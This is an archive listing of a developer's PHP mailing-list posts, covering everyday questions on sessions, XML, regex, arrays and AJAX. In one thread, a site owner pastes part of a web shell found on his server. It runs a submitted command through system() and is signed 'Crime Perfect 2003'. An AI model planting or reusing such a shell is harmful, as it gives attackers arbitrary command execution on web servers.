[PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
Hello, I am using PHP to build an XML file, but I keep on getting an XML error when open the file in Google Chrome. - This page contains the following errors: error on line 30 at column 318: Entity 'iuml' not defined

Re: [PHP] Error in Building an XML File

2009-03-09 Thread Joe Harman
On Mon, Mar 9, 2009 at 9:53 AM, Bob McConnell r...@cbord.com wrote: From: Joe Harman I am using PHP to build an XML file, but I keep on getting an XML error when open the file in Google Chrome. - This page

[PHP] Action on 'Require' Fatal Error

2008-07-09 Thread Joe Harman
Hello, is there a way to call a function or do a header(Location: page.php) when a fatal error is detected from using a the require statement Thanks Joe Harman

[PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
Hello, is there any way to get more field information other than just the value of a field when a form is submitted??? ex: input name=email type=text id=email size=30 maxlength=120 class=theClass value= / type, size, class, etc. Thanks Joe -- PHP General Mailing List (http://www.php.net/)

Re: [PHP] Retrive a ID or Class value from a form input field

2008-06-09 Thread Joe Harman
make thing neat and tidy Thanks for all your input Joe On Mon, Jun 9, 2008 at 3:09 PM, Jim Lucas [EMAIL PROTECTED] wrote: Jim Lucas wrote: Jim Lucas wrote: Joe Harman wrote: Hello, is there any way to get more field information other than just the value of a field when a form is submitted

Re: [PHP] Re: PHP Web Apps OpenID

2008-05-07 Thread Joe Harman
though... which is what I want to make it easy convienent for those repeat customers thanks for your input guys Joe On Wed, May 7, 2008 at 4:04 AM, Colin Guthrie [EMAIL PROTECTED] wrote: Joe Harman wrote: I am curious here if any of you are considering or already using OpenID or Windows

[PHP] PHP Web Apps OpenID

2008-05-06 Thread Joe Harman
been looking at some PHP scripts out there for OpenID... does anyone have one to recommend??? -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Help with preg_match_all regex for alt tags

2008-04-29 Thread Joe Harman
=Shopping Cart Thanks for your help -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] mysql_connect slowness

2008-04-29 Thread Joe Harman
Hi Waynn! have you ever tried using 1. sql_cache SELECT SQL_CACHE * FROM table .. I use this alot... although you have to have mysql cache enable in the sql config file... your webhost can tell you if it is on or not 2. make indexes for your tables here is a good article

[PHP] Making an array from delimited data

2008-04-28 Thread Joe Harman
'] = 0-11,000 rpm I know I can use explode on on set of data... but up do you do it line by line? Thanks for your help -- Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
this is the complete data that was initially submitted through a textarea field. On Mon, Apr 28, 2008 at 2:56 PM, Shawn McKenzie [EMAIL PROTECTED] wrote: Joe Harman wrote: I have some data that I pull from a database that is in the following format

Re: [PHP] Re: Making an array from delimited data

2008-04-28 Thread Joe Harman
Thanks guys... that help me out a lot... i was thinking too hard on ... LOL have a great day! Joe On Mon, Apr 28, 2008 at 3:01 PM, Nathan Nobbe [EMAIL PROTECTED] wrote: On Mon, Apr 28, 2008 at 1:58 PM, Joe Harman [EMAIL PROTECTED] wrote: this is the complete data that was initially submitted

Re: [PHP] RE:[PHP] Client Computer Registration

2006-10-03 Thread Joe Harman
://www.informed-sources.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Subscribe to my FRIENDS email list by sending an email to [EMAIL PROTECTED] with subject line of Subscribe -- PHP General Mailing List (http

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
Marketing Services Inc. 500 Federal Street, Suite 201 Troy NY 12180 Tel: (518) 687-6700 x154 Fax: (518) 687-6799 Email: [EMAIL PROTECTED] http://www.informed-sources.com -- Joe Harman - * My programs never have bugs, they just develop random features. -- PHP General Mailing List

Re: [PHP] IP Address Filtering

2006-03-29 Thread Joe Harman
Good thing I don't have kids! On 3/29/06, Kevin Kinsey [EMAIL PROTECTED] wrote: Joe Harman wrote: if you really want to mess with them.. only show the user with the NULL IP address all the spam posts.. .make them think that they've been successful Freaking hilarious idea!! Remind me

[PHP] ob_start session_start

2005-12-07 Thread Joe Harman
Hello, Something just crossed my mind about using output buffering is there any reason why you should start a session before calling ob_start() ??? Just curious which way would be the proper way of doing it... or doesn't it matter? Thanks -- Joe Harman - * My programs never have

Re: [PHP] ob_start session_start

2005-12-07 Thread Joe Harman
session uses cookies (this is usually automatically decided by php) it cannot send out the header after the buffer. On 12/7/05, Joe Harman [EMAIL PROTECTED] wrote: Hello, Something just crossed my mind about using output buffering is there any reason why you should start a session

[PHP] Re: [PHP-DB] ftp_put

2005-12-07 Thread Joe Harman
the data to a database such as the file name and location so that it can easily be found by the system otherwise I'd just tell them to use normal FTP software. What's the best way of achieving this? I'm talking file 5-20megs in size. Thanks everyone. Chris -- Joe Harman - * My

Re: [PHP] ob_start session_start

2005-12-07 Thread Joe Harman
... but then again, you guys are the experts... i am sure someone knows a reason when you should not do that. ;o) Joe On 12/8/05, Chris Shiflett [EMAIL PROTECTED] wrote: Joe Harman wrote: Okay...makes sense after you spelled it out to me. That didn't make sense to me (and I missed the original

Re: [PHP] What software do you use for writing PHP?

2005-12-06 Thread Joe Harman
://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - * My programs never have bugs, they just develop random features. -- PHP General Mailing

[PHP] Re: [PHP-DB] Drag and Drop with PHP and MySQL

2005-11-18 Thread Joe Harman
and MYSQL. Any helps / pointers would be REALLY welcome. Chris -- PHP Database Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail

Re: [PHP] Re: [PHP-DB] Drag and Drop with PHP and MySQL

2005-11-18 Thread Joe Harman
-Greene [EMAIL PROTECTED] To: Joe Harman [EMAIL PROTECTED] Cc: php-general@lists.php.net Sent: Friday, November 18, 2005 8:52 PM Subject: Re: [PHP] Re: [PHP-DB] Drag and Drop with PHP and MySQL Joe Harman wrote: Hi Chris, I would think that there has to be something out there like

Re: [PHP] Any good free easy converting tool?

2005-10-12 Thread Joe Harman
/) To unsubscribe, visit: http://www.php.net/unsub.php Hey Gustav!!! I use Navicat... i think they have a free trail package for their software... it's the best that I can find out there!! Good luck! Joe -- Joe Harman - Do not go where the path may lead, go instead where there is no path

Re: [PHP] [Off] How much time should this take?

2005-09-16 Thread Joe Harman
it for us.. centos is redhat, apache mysql and a bunch of other stuff... now that i know what was used, i probably would just do it myself... not to say that i could have done the install as fast -- Joe Harman - Do not go where the path may lead, go instead where there is no path

[PHP] Output Buffering Error? 4.3.10??

2005-08-17 Thread Joe Harman
help! Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] AJAX PHP

2005-07-21 Thread Joe Harman
to implement Google Suggest in PHP: http://tinyurl.com/dxs8b Paul -- Rogue Tory http://www.roguetory.org.uk -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Do not go where the path may lead, go

[PHP] Re: Rasmus' 30 second AJAX Tutorial - [was Re: [PHP] AJAX PHP]

2005-07-21 Thread Joe Harman
) { http.open('get', 'rpc.php?action='+action+'arg='+arg); http.onreadystatechange = handleResponse; http.send(null); } And your handleResponse can easily be expanded to do much more interesting things than just replacing the contents of a div. -Rasmus Joe Harman wrote: Yeah, AJAX

Re: [PHP] Re: Echo array string index?

2005-07-14 Thread Joe Harman
(http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson

Re: [PHP] text areas and line brakes

2005-06-21 Thread Joe Harman
/en/index.php STFW | http://www.google.com/search?q=php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo

[PHP] Merging Duplicate array items

2005-06-18 Thread Joe Harman
' ); -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: [SOLVED] Merging Duplicate array items

2005-06-18 Thread Joe Harman
); $cart_count = 0; } On 6/18/05, Joe Harman [EMAIL PROTECTED] wrote: Hello, I've been trying to figure out on how I could evaluated this array and combine like items... here is the array.. it represents a shopping cart contents.. you'll notice

Re: [PHP] http to https session problem

2005-06-11 Thread Joe Harman
On 6/11/05, Joe Harman [EMAIL PROTECTED] wrote: On 6/11/05, Richard Lynch [EMAIL PROTECTED] wrote: On Thu, June 9, 2005 7:43 am, Joe Harman said: I am having a little problem with users keeping the same session id when they go from http to https... is there a work around for this... I

[PHP] http to https session problem

2005-06-09 Thread Joe Harman
in a cookie??? or is there another way or setting -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Making a page loop with header('Location: ...

2005-06-09 Thread Joe Harman
-- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Making a page loop with header('Location: ...

2005-06-09 Thread Joe Harman
On 6/9/05, Richard Davey [EMAIL PROTECTED] wrote: Hello Joe, Friday, June 10, 2005, 12:36:13 AM, you wrote: JH is it possible to make a page loop with header('Location : JH page.php')??? JH I've ran into a little bit of a snag with php execution time... JH so, i need to execute the

Re: [PHP] autocomplete a field

2005-06-03 Thread Joe Harman
/wiki/doku.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- Joe Harman - Do not go where the path may lead, go instead where there is no path and leave a trail. - Ralph Waldo Emerson -- PHP General Mailing List (http

Re: [PHP] PHP and USB Devices

2005-06-01 Thread Joe Harman
end for user authentication.. someone mentioned using the PHP functions to call the COM object... guess I have do some reading ;o) Cheers Joe Cheers! On 6/1/05, Kim Madsen [EMAIL PROTECTED] wrote: -Original Message- From: Joe Harman [mailto:[EMAIL PROTECTED] Sent: Tuesday, May

[PHP] PHP and USB Devices

2005-05-31 Thread Joe Harman
Has anyone out there found a way to get information from a USB device running on their computer... what i am trying to do is retrive the fingerprint ID that the Microsoft USB fingerprint reader returns for a finger print and put it in a webpage form??? There has to be a way to do it... -- Joe

Re: [PHP] PHP and USB Devices

2005-05-31 Thread Joe Harman
sort of other hardware/software solution out there that I will run across... anyhow... thanks for your help... my apologizes for making an off topic request Joe On 5/31/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On 5/31/05, Joe Harman [EMAIL PROTECTED] wrote: Has anyone out there found

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
, Joe Harman said: Hey just curious if it's okay to encode variables that are passed in URLs with base64_encode??? since, I am going to pass a email address in the URL, I would like to protect the email address from typical people I dunno if every character that can be output

Re: [PHP] base64_encode in URLs

2005-05-11 Thread Joe Harman
to show images manually. This could fool your automatic counting and email verification. On 5/11/05, Joe Harman [EMAIL PROTECTED] wrote: HA... Thanks for your thoughts... I am actually using this for a broadcast email system... I just use a PHP image generator to make a 1 x1 gif

[PHP] base64_encode in URLs

2005-05-10 Thread Joe Harman
Hey just curious if it's okay to encode variables that are passed in URLs with base64_encode??? since, I am going to pass a email address in the URL, I would like to protect the email address from typical people -- Joe Harman - Do not go where the path may lead, go instead where

Re: [PHP] Php defense

2005-04-22 Thread Joe Harman
My 2 Cents ASP is a Platform that supports a number of different microsoft languages which includes ASP Javascript, ASP VBScript, ASP.Net C# ASP.Net VB ... ASP has a couple of good points to it... most notably is that it is backed by the largest computer company out there.. Microsoft... also,

[PHP] PHP Wire Ready

2005-04-12 Thread Joe Harman
Hello, Curious if anyone out there has any experience using PHP with Wire Ready??? We've taken over a site that uses the wire ready service... which is all done in ASP and needs to be converted over to PHP?? does anyone have or know of any pre-made classes or functions for dealing with this

[PHP] Re: Javascript Calendar and PHP

2005-04-06 Thread Joe Harman
-- Forwarded message -- From: Joe Harman [EMAIL PROTECTED] Date: Apr 6, 2005 2:50 AM Subject: Re: [PHP] Re: Javascript Calendar and PHP To: Nadim Attari [EMAIL PROTECTED] interakt has a great one that is used with field forms... it's like $30 or something... it's actually

Re: [PHP] Re: A strange problem..

2005-04-04 Thread Joe Harman
Hey Josh... make sure your mysql table column is a integer... not a varchar.. i've done that by mistake a few times! On Apr 4, 2005 3:22 PM, chris [EMAIL PROTECTED] wrote: what is the structure of your table? JoShQuNe [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Hi, i have a

Re: [PHP] Any personal experience with MySQL/Calendar application

2005-03-29 Thread Joe Harman
Hey Todd... I have one that I created and posted at Zend.com ... it can be easily adapted to store data n MySQL... Joe On Tue, 29 Mar 2005 12:33:12 -0500, Peter G. Brown [EMAIL PROTECTED] wrote: I have used egroupware in a company setting and found it to be largely satisfactory. It might be

Re: [PHP] html image

2005-03-25 Thread Joe Harman
check out http://www.whois.sc they do exactley what you are talking about. i don't think you can make PHP do this.. there maybe someway to do it with imagemagik but i am not even sure about that also... here is a free ware program that does it.. but you have to do it manually

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
Hey, I was curious if anyone here stores arrays in MySQL... and how r u doing this... are you converting the values to a delimited string or is there another way? Thanks Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Storing Arrays in a database

2005-03-24 Thread Joe Harman
PROTECTED] wrote: check serialize() and unserialize() in manual. implode() and explode() functions too. -afan Joe Harman wrote: Hey, I was curious if anyone here stores arrays in MySQL... and how r u doing this... are you converting the values to a delimited string

Re: [PHP] PHP file as homepage?

2005-03-15 Thread Joe Harman
Hey Phil, this can be defined in the apache config file Joe On Tue, 15 Mar 2005 11:10:30 -0500, Phil Neeb [EMAIL PROTECTED] wrote: I've noticed that PHP.net uses index.php as its homepage and well, I'm curious as to how that's possible. Is it the server setup that allows them to load a php

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd, I use iframe alot.. what you have to do is tell it a target... but, i am not sure if you can do that with header('Location:...) .. i would be interested to know also Joe On Mon, 28 Feb 2005 16:30:28 -0800, Todd Cary [EMAIL PROTECTED] wrote: My client insists on using inline Frames

Re: [PHP] Inline Frame and php

2005-03-01 Thread Joe Harman
Hey Todd... I really think what you are going to have to do is pass a javascript variable to the parent page.. cause you are trying to send a variable from the php search page to the parent that has the iframe in it... I am correct in assuming that? On Tue, 1 Mar 2005 16:33:58 -, Mikey

Re: [PHP] Weird Error Help

2005-02-18 Thread Joe Harman
... I did add ob_start() and ob_flush() to the site... that seemed to reduce the occurance of the error though... Thanks! Joe On Thu, 17 Feb 2005 15:41:10 -0800 (PST), Richard Lynch [EMAIL PROTECTED] wrote: Joe Harman wrote: Hey has anyone had an error like this one? and have a solution

[PHP] Weird Error Help

2005-02-17 Thread Joe Harman
Hey has anyone had an error like this one? and have a solution --- Warning: Unexpected character in input: '' (ASCII=1) state=1 in **/_eid_page_functions.php on line 173 it appears to be very random... could be my PHP code... but

Re: [PHP] PHP book recommendations

2005-02-15 Thread Joe Harman
Feb 2005 14:20:05 -0500, Joe Harman [EMAIL PROTECTED] wrote: sorry... wrong address On Tue, 15 Feb 2005 14:19:46 -0500, Joe Harman [EMAIL PROTECTED] wrote: personally, I like Julie Meloni's books... PHP essentials.. and fast and easy web development... these were some of the first books

Re: [PHP] Log-in script help

2005-01-26 Thread Joe Harman
Tom, That's a great tip! Joe On Wed, 26 Jan 2005 10:03:31 +, Tom [EMAIL PROTECTED] wrote: Joe Harman wrote: Hey Andrew... IN MY OPINION... forget the cookies... only use php sessions... but like I said IMO you can never rely on the end user having them cookies enabled... same

Re: [PHP] Re: [NEWBIE GUIDE] For the benefit of new members

2005-01-25 Thread Joe Harman
Great List... although.. .just having a sense humor here... i think every topic has been covered a number of times... which means no one should be posting questions at the php list... cause they are all in the archive :0) cheers! Joe On Tue, 25 Jan 2005 09:48:53 -0500, Jason Barnett [EMAIL

[PHP] Replace credit card numbers with X ???

2005-01-25 Thread Joe Harman
Hello, I need to replace all the numbers of a credit card except for the last 4 with an 'X' ... can't seem to locate the string function for this... can someone point me in the right direction here to what php item i should be using. Thanks! Joe -- PHP General Mailing List

Re: [PHP] Log-in script help

2005-01-25 Thread Joe Harman
Hey Andrew... IN MY OPINION... forget the cookies... only use php sessions... but like I said IMO you can never rely on the end user having them cookies enabled... same with things like javascript... let me outline some steps for you... everyone else... feel free to state pros and cons to

[PHP] Re: [PHP-DB] checkboxes

2005-01-21 Thread Joe Harman
Well.. i just got done doing something like what you are trying to accomplish... you will need to name your check boxes like so : name=completed[] when the form is submitted, I use something like this and shove it into a field in the database: if($_POST['completed'] NULL) { // This makes one

[PHP] On large application organization [long and possibly boring]

2005-01-07 Thread Joe Harman
This is Definatley a good conversation... I've realy thought of doing it this way... but i do agree with the person who said that 'having to keep track of a ton of different files could get complicated ... i can't imagine the performance difference would be that big... but then again, i suppose it

[PHP] Updated: Calendar Script

2005-01-04 Thread Joe Harman
type=text/css !-- body { font-family: Tahoma, Verdana, Helvetica, Arial, sans-serif; font-size: 11px; color: #00; } -- /style /head body leftmargin=1 marginwidth=1 ?php // Created By Joe Harman - [EMAIL PROTECTED] function Cal_Month() { // Get

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
$month_day_count."".$highlight_today_close."/td";$first_week_marked = TRUE;}$week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);}else{$cal_generated .= "td height=\"".$table_height."\" valign=\"top\"".$highlight_today_open ."".$month_day_count."".$highlight_today_close."/td";}$month_day_count++;// If it is the last day of the week close ROWif($week_day_count == 6){$cal_generated .= "/tr";}$week_day_count++;// Countingsif($week_day_count == 7){$week_day_count=0;}} while ($month_day_count = $num_days_in_month);// End Calendar Loop$cal_generated .= "/table";return $cal_generated;} echo Cal_Month(); ? Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Calendar Script

2004-12-29 Thread Joe Harman
$month_day_count."".$highlight_today_close."/td";$first_week_marked = TRUE;}$week_day_count = $the_first_day_of_the_month['wday'];} while ($first_week_marked == FALSE);}else{$cal_generated .= "td height=\"".$table_height."\" valign=\"top\&quo

[PHP] Help with a image upload class

2004-07-21 Thread Joe Harman
Hello, I was curious if someone would help me alter this class so that instead of using it to upload images... I could send it a full URL path to an image, and it would save it to my server... Thanks, Joe Class --- ?php class upload { // class variable var

[PHP] Storing website templates in sessions

2004-07-07 Thread Joe Harman
Hey everyone... I was curious if anyone out there has some pros and cons to storing a website template that is extracted from a mysql db and stored in a session... is this an efficient way to do it? also... does anyone know what the size limitations for a session would be? Thanks, Joe -- PHP

[PHP] Question about array limits practicallity

2004-01-21 Thread Joe Harman
I am curious how much data an array can hold.. And what the pros and cons are. Example.. I am making a testing system that will give a student a 102 question test... The test would be generated so that each one is different... So would it be practical to load all 102 questions and their options

RE: [PHP] Question about array limits practicallity

2004-01-21 Thread Joe Harman
Thanks for your comments Chris and Rob... Chris you have great points to make, my ears are wide open... The reason I thought about storing the array in a blob is because every test generated will be different. the 102 question test will be generate randomly from a bank of 500 questions.. That

[PHP] Converting PHP code to class

2004-01-18 Thread Joe Harman
Hey, Just curious if anyone here would be interested in helping me convert my PHP Calendar into a class... I am not to good at it... But I figure if someone would like to do it they could get this nifty calendar program that I made... Nice little trade... Let me know and I will forward the code.

[PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Hello, I am curious if there is anyway to take a variable that is passed via a URL by a reguler text hyperlink Ex: http://localhost/Calendar/active_layout.php?d=2.1.2004 and hide it like you would do with the POST method using forms Ex: http://localhost/Calendar/active_layout.php Hidden or

RE: [PHP] POST method for hyperlink

2004-01-17 Thread Joe Harman
Thanks Richard... I will do some erading on that Cheers! Joe -Original Message- From: Richard Davey [mailto:[EMAIL PROTECTED] Sent: Saturday, January 17, 2004 11:08 PM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] POST method for hyperlink Hello Joe, Sunday, January 18

[PHP] Echo HTML code Verses breaking out of ?php ?

2003-11-21 Thread Joe Harman
Hello, I would like some opinions, or hopefully facts on a few things... Maybe some people can help me out here. A friend of mine and I were discussing which is best way to use PHP building dynamic pages, here are the 2 methods we are comparing.. They are in the simplest terms here... But try

[PHP] MySQL get second row problem

2003-10-02 Thread Joe Harman
Hello... I am having just alittle trouble with this... I know it's simple... Look at my comment for the problem I am having ?php mysql_select_db($database_ideation, $ideation); $query_rsLastL = SELECT * FROM logins WHERE user_id = '$UserID' ORDER BY `date` DESC; $rsLastL =

RE: [PHP] MySQL get second row problem [Solved]

2003-10-02 Thread Joe Harman
Hey Thanks Petre Cheers... And a big brain fart -Original Message- From: Petre Agenbag [mailto:[EMAIL PROTECTED] Sent: Thursday, October 02, 2003 6:17 AM To: Joe Harman Cc: [EMAIL PROTECTED] Subject: Re: [PHP] MySQL get second row problem Either limit your query to return

[PHP] PNGs PHP feedback

2003-09-30 Thread Joe Harman
Hello, I am looking for some guidance... I am using PHP to make dynamic buttons... Is the PNG image format a pretty safe thing to go with... Standard wise? Thanks for your input. Joe -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] IP to Postal Code CSV? anyone messed around with this and PHP

2003-09-23 Thread Joe Harman
Is there a CSV file out there for this Does anyone know where I can aquire a file that has IP address with the corresponding Postal Code? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] [Thoughts About This] [Newbie Guide] For the benefit of new members

2003-09-05 Thread Joe Harman
Great guide here Ma Siva Kumar... I am a little guilty of not doing this, actually recently too... As I think most of us are at one point or another... Although I would like to add alittle something, maybe just alittle guidance for newbies and seasoned professionals like yourself! 1. Helping

[PHP] Thanks Richard Schwartz

2003-09-04 Thread Joe Harman
Dude stop being a jerk, I don't treat people this way... Ah, anyhow... It's not me who will judge you Is it? -Original Message- From: Richard Schwartz [mailto:[EMAIL PROTECTED] Sent: Thursday, September 04, 2003 11:28 AM To: Joe Harman Subject: Re: Thanks From Joe: ATM Archives

[PHP] Restart Apache with PHP???

2003-09-02 Thread Joe Harman
Hey guys gals... Is there a way to restart Apache with a PHP command? Joe Harman -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] PHP - XHTML converter to HDML or WML

2003-08-30 Thread Joe Harman
of different errors. So the first step would be to figure out how to determine a cell phone user's browser. So what's it capable of WML 1.1 or WML 2.0, HDML.. Or XHTML Appreciate the feedback, Joe Harman http://www.HarmanMedia.com Have you ever noticed? Anybody going slower than you is an idiot

[PHP] Easy XML PHP tutorials ?????

2003-08-21 Thread Joe Harman
Hello all. does anyone have any very easy XML tutorials . I have a simple weather feed I want to implement. but no XML experience thanks Joe Harman

RE: [PHP] Easy XML PHP tutorials ?????

2003-08-21 Thread Joe Harman
Burhan! Thanks a lot... This is great... I am going through it right ... Have a great day! Joe -Original Message- From: Burhan Khalid [mailto:[EMAIL PROTECTED] Sent: Thursday, August 21, 2003 10:35 PM To: Joe Harman; [EMAIL PROTECTED] Subject: Re: [PHP] Easy XML PHP tutorials

[PHP] Installer Software

2003-08-14 Thread Joe Harman
on the desktop... can anyone recommend anything out there.. preferably that is free Respectfully, Joe Harman

[PHP] postmaster@hanmir.com

2003-08-14 Thread Joe Harman
Hey is every one getting a returned message from [EMAIL PROTECTED] Joe Harman

RE: [PHP] error: cannot redeclare ()

2003-08-14 Thread Joe Harman
Hi Martin... I am guessing you have a nested function that is being redeclared, your error would come from there... Just a guess anyhow... Joe -Original Message- From: Martin Towell [mailto:[EMAIL PROTECTED] Sent: Thursday, August 07, 2003 2:11 AM To: [EMAIL PROTECTED] Subject:

[PHP] Flash Actionscript List or Forum

2003-08-12 Thread Joe Harman
Hello all, I've been doing PHP for a little while now... I am starting learn Action Script now... and having trouble with global variables and functions... does anyone know where I find a good list or forum for action script? Joe Harman http://www.HarmanMedia.com I used to think I

RE: [PHP] Still can't pass variable through url

2003-08-12 Thread Joe Harman
?php $year=1999; $month=march; echo a href=\http://www.thingamajigger.com/index.php?year=$yearmonth=$month\; yeah this is the link/a; ? -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Friday, August 08, 2003 2:47 AM To: Martin Towell Cc: 'Jack'; [EMAIL

RE: [PHP] Re: [ERR] DEAD MAILBOX

2003-08-11 Thread Joe Harman
CHRISTMAS IN AUGUST! -Original Message- From: andu [mailto:[EMAIL PROTECTED] Sent: Friday, August 08, 2003 2:53 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] Re: [ERR] DEAD MAILBOX On Fri, 08 Aug 2003 02:52:31 -0400 John Manko [EMAIL PROTECTED] wrote: arrg.

RE: [PHP] Still can't pass variable through url

2003-08-08 Thread Joe Harman
Jack... Can you paste your code into an email and post it -Original Message- From: Jack [mailto:[EMAIL PROTECTED] Sent: Friday, August 08, 2003 2:30 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [PHP] Still can't pass variable through url Dear all I had set the

RE: [PHP] Still can't pass variable through url.. whoops

2003-08-08 Thread Joe Harman
YEPPERS.. You're right -Original Message- From: Martin Towell [mailto:[EMAIL PROTECTED] Sent: Friday, August 08, 2003 2:59 AM To: 'Joe Harman'; [EMAIL PROTECTED] Subject: RE: [PHP] Still can't pass variable through url This _might_ be causing you problems... $month=march

[PHP] PHP P2P File sharing

2003-08-06 Thread Joe Harman
Hello, I curious if anyone knows of a PHP based Peer-to-Peer file sharing program out there! I have a friend that wants to implement this with his web server.. Joe Harman

RE: [PHP] PHP P2P File sharing

2003-08-06 Thread Joe Harman
make a file locker type app for them Joe -Original Message- From: Chris Shiflett [mailto:[EMAIL PROTECTED] Sent: Wednesday, August 06, 2003 11:28 PM To: Joe Harman; [EMAIL PROTECTED] Subject: Re: [PHP] PHP P2P File sharing --- Joe Harman [EMAIL PROTECTED] wrote: I curious

RE: [PHP] Tracking Users via Cookies? IDEA

2003-08-04 Thread Joe Harman
What if you could read a browser's history file... There has to be a way to do this with something like javascript... Just an idea... Joe -Original Message- From: Ryan A [mailto:[EMAIL PROTECTED] Sent: Sunday, August 03, 2003 9:03 PM To: Jason Bourque Cc: [EMAIL PROTECTED] Subject: Re:

[PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
if ($command) { if ($stderr) { system($command . 1 /tmp/output.txt 21; cat /tmp/output.txt; rm /tmp/output.txt); } else { system($command); } } ? /textarea /p /form pbCrime Perfect 2003 /b/p pbBy _m4st3r_c0d3 - #crimeperfect/b/p /div /body /html Joe Harman http

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
Fortunatly I don't think they were doing something correctly, cause it didn't deface my site like some of the others Thanks all Joe -Original Message- From: Adrian [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 2:14 AM To: [EMAIL PROTECTED] Subject: Re: [PHP] Possible My

RE: [PHP] Possible My Website was hacked... with PHP... please tell me what this is???

2003-07-31 Thread Joe Harman
my webhost... I guess it wasn't the first time they've seen this... So the are taking action on it and probably canceling my account... LOL... Thanks for all your help! Joe -Original Message- From: Joel Rees [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 3:10 AM To: Joe Harman

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Oh, do you mean like Chilisoft for PHP on a IIS server... LOL.. That would be funny -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent: Thursday, July 31, 2003 10:13 AM To: Jay Blanchard Cc: Ralph Guzman; PHP General Mailing List Subject: Re: [PHP] Article: PHP vs ASP

RE: [PHP] Article: PHP vs ASP

2003-07-31 Thread Joe Harman
Yes I agree it would be funny... In my opinion there is no need for the ASP platform... But then again, who am I for having an educated opinion, I let a hacker put a shell script on my site NOW THAT'S FUNNY! -Original Message- From: John Manko [mailto:[EMAIL PROTECTED] Sent:

[PHP] Strip Numbers

2003-07-30 Thread Joe Harman
Hey could someone help me out here I need to strip numbers from a passed variable ex. 3899007 all the numbers will have 990 (so that is the 4th, 5th sixth numbers... from the right...) I want to keep everything to the left of the two 9s... is there an easy way to do that Joe

  1   2   >